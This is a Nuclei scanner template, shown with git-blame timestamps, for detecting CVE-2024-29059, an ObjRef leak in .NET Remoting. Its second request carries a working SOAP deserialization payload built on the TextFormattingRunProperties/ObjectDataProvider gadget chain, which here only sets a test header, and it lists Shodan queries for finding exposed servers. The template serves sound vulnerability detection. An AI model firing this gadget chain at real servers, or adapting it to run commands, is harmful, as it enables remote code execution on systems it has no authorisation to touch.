2024-03-28 13:17:52 +00:00
|
|
|
id: CVE-2024-29059
|
|
|
|
|
|
|
|
info:
|
2024-03-28 14:40:27 +00:00
|
|
|
name: .NET Framework - Leaking ObjRefs via HTTP .NET Remoting
|
|
|
|
author: iamnoooob,rootxharsh,DhiyaneshDk,pdresearch
|
2024-03-28 13:17:52 +00:00
|
|
|
severity: high
|
|
|
|
description: .NET Framework Information Disclosure Vulnerability
|
|
|
|
reference:
|
|
|
|
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059
|
|
|
|
- https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/
|
|
|
|
- https://github.com/codewhitesec/HttpRemotingObjRefLeak
|
2024-05-31 19:23:20 +00:00
|
|
|
- https://github.com/NaInSec/CVE-LIST
|
|
|
|
- https://github.com/fkie-cad/nvd-json-data-feeds
|
2024-03-28 13:17:52 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2024-29059
|
2024-05-31 19:23:20 +00:00
|
|
|
cwe-id: CWE-209
|
|
|
|
epss-score: 0.01259
|
|
|
|
epss-percentile: 0.85581
|
2024-03-28 14:40:27 +00:00
|
|
|
cpe: cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:*
|
2024-03-28 13:17:52 +00:00
|
|
|
metadata:
|
2024-03-28 14:40:27 +00:00
|
|
|
max-request: 2
|
|
|
|
vendor: microsoft
|
|
|
|
product: .net_framework
|
2024-06-07 10:04:29 +00:00
|
|
|
shodan-query:
|
|
|
|
- 'Server: MS .NET Remoting'
|
|
|
|
- "server: ms .net remoting"
|
2024-03-30 02:16:40 +00:00
|
|
|
tags: cve,cve2024,dotnet,microsoft,remoting,deserialization
|
2024-03-28 13:17:52 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
2024-03-28 14:40:27 +00:00
|
|
|
- |
|
2024-03-28 13:17:52 +00:00
|
|
|
GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
__RequestVerb: POST
|
|
|
|
Content-Type: text/xml
|
2024-03-28 13:26:32 +00:00
|
|
|
|
2024-03-28 14:40:27 +00:00
|
|
|
- |
|
|
|
|
POST {{objref}} HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
SOAPAction: ""
|
|
|
|
Content-Type: text/xml
|
2024-03-28 13:17:52 +00:00
|
|
|
|
2024-03-28 14:40:27 +00:00
|
|
|
<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
|
|
|
|
<a1:TextFormattingRunProperties id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35">
|
|
|
|
<ForegroundBrush id="ref-3"><ObjectDataProvider MethodName="AddHeader"
|
|
|
|
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
|
|
|
|
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
|
|
|
|
xmlns:System="clr-namespace:System;assembly=mscorlib"
|
|
|
|
xmlns:System.Web="clr-namespace:System.Web;assembly=System.Web"><ObjectDataProvider.ObjectInstance><ObjectDataProvider MethodName="get_Response"><ObjectDataProvider.ObjectInstance>
|
|
|
|
<ObjectDataProvider ObjectType="{x:Type System.Web:HttpContext}" MethodName="get_Current" />
|
|
|
|
</ObjectDataProvider.ObjectInstance>
|
|
|
|
</ObjectDataProvider>
|
|
|
|
</ObjectDataProvider.ObjectInstance>
|
|
|
|
<ObjectDataProvider.MethodParameters>
|
|
|
|
<System:String>X-Vuln-Test</System:String>
|
|
|
|
<System:String>{{randstr}}</System:String>
|
|
|
|
</ObjectDataProvider.MethodParameters>
|
|
|
|
</ObjectDataProvider></ForegroundBrush>
|
|
|
|
</a1:TextFormattingRunProperties>
|
|
|
|
</SOAP-ENV:Envelope>
|
|
|
|
|
|
|
|
extractors:
|
2024-03-28 13:17:52 +00:00
|
|
|
- type: regex
|
2024-03-28 14:40:27 +00:00
|
|
|
name: objref
|
|
|
|
part: body_1
|
|
|
|
group: 1
|
2024-03-28 13:17:52 +00:00
|
|
|
regex:
|
2024-03-28 14:40:27 +00:00
|
|
|
- "(/[0-9a-f_]+/[0-9A-Za-z_+]+_[0-9]+\\.rem)"
|
|
|
|
internal: true
|
|
|
|
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- x_vuln_test
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- "contains(body_1,'ObjRef')"
|
|
|
|
- "contains(x_vuln_test,'{{randstr}}')"
|
2024-03-29 03:22:33 +00:00
|
|
|
condition: and
|
2024-06-08 16:02:17 +00:00
|
|
|
# digest: 4a0a004730450220345063f60a2d0c6207c121752f7cb77e3dcbed7838778fba2d50401c0157e8b3022100c4030d56682e9556b292d09469ecf21d4119b2f3b7dd00ad8d5ee7c70a1c1f00:922c64590222798bb761d5b6d8e72950
|